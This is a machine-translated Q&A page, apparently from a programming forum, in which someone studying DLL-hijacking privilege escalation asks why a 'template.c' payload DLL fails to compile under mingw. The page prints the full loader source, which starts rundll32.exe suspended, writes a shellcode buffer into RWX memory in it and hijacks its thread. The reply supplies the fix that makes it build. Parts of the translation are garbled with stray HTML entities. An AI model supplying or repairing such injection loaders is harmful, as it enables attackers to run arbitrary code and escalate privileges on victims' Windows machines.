使用DLL劫持的权限提升 - 编译时出错" template.c"

时间:2016-04-23 21:59:58

标签: windows

我正在学习关于DLL劫持的信息,这是Vivek制作的这个视频 - Privilege Escalation using DLL Hijacking

一切都得到了很好的解释,但有一段话让我陷入困境。它是关于编译" template.c"在Kali Linux上使用mingw32。当我做与视频中描述的相同的事情时,意味着:

  

root @ kali:〜#i686-w64-mingw32-gcc-win32 template.c -o template.dll   -shared

我仍然收到此错误:

  

/tmp/ccRJy0bd.o:template.c :(。text + 0x49):未定义的引用   `inline_bzero' collect2:错误:ld返回1退出状态

以下是" template.c"

的源代码
#include <windows.h>
#include "template.h"

#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{

           BYTE *q = (BYTE *)p;
           size_t x = 0;
           for (x = 0; x < l; x++)
                     *(q++) = 0x00;
}

#endif


void ExecutePayload(void);

BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
        case DLL_PROCESS_ATTACH:
            ExecutePayload();
            break;

        case DLL_PROCESS_DETACH:
            // Code to run when the DLL is freed
            break;

        case DLL_THREAD_ATTACH:
            // Code to run when a thread is created during the DLL's lifetime
            break;

        case DLL_THREAD_DETACH:
            // Code to run when a thread ends normally.
            break;
    }
    return TRUE;
}

void ExecutePayload(void) {
    int error;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    CONTEXT ctx;
    DWORD prot;
   LPVOID ep;

    // Start up the payload in a new process
    inline_bzero( &si, sizeof( si ));
    si.cb = sizeof(si);

    // Create a suspended process, write shellcode into stack, make stack RWX, resume it
    if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
        ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
        GetThreadContext(pi.hThread, &ctx);

       ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);

#ifdef _WIN64
       ctx.Rip = (DWORD64)ep;
#else
       ctx.Eip = (DWORD)ep;
#endif

        SetThreadContext(pi.hThread,&ctx);

        ResumeThread(pi.hThread);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
   // ExitProcess(0);
   ExitThread(0);
}

/*
typedef VOID
(NTAPI *PIMAGE_TLS_CALLBACK) (
    PVOID DllHandle,
    ULONG Reason,
    PVOID Reserved
    );

VOID NTAPI TlsCallback(
      IN PVOID DllHandle,
      IN ULONG Reason,
      IN PVOID Reserved)
{
    __asm  ( "int3" );
}

ULONG _tls_index;
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
*/

&& 34; template.h&#34;,如果需要。

#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";

解决。

只需删除&#34; #if BUILDMODE == 2&#34;和&#34; #endif&#34;行,然后编译成功完成。

1 个答案:

答案 0 :(得分:0)

只需删除#if BUILDMODE == 2#endif行,即可成功完成编译。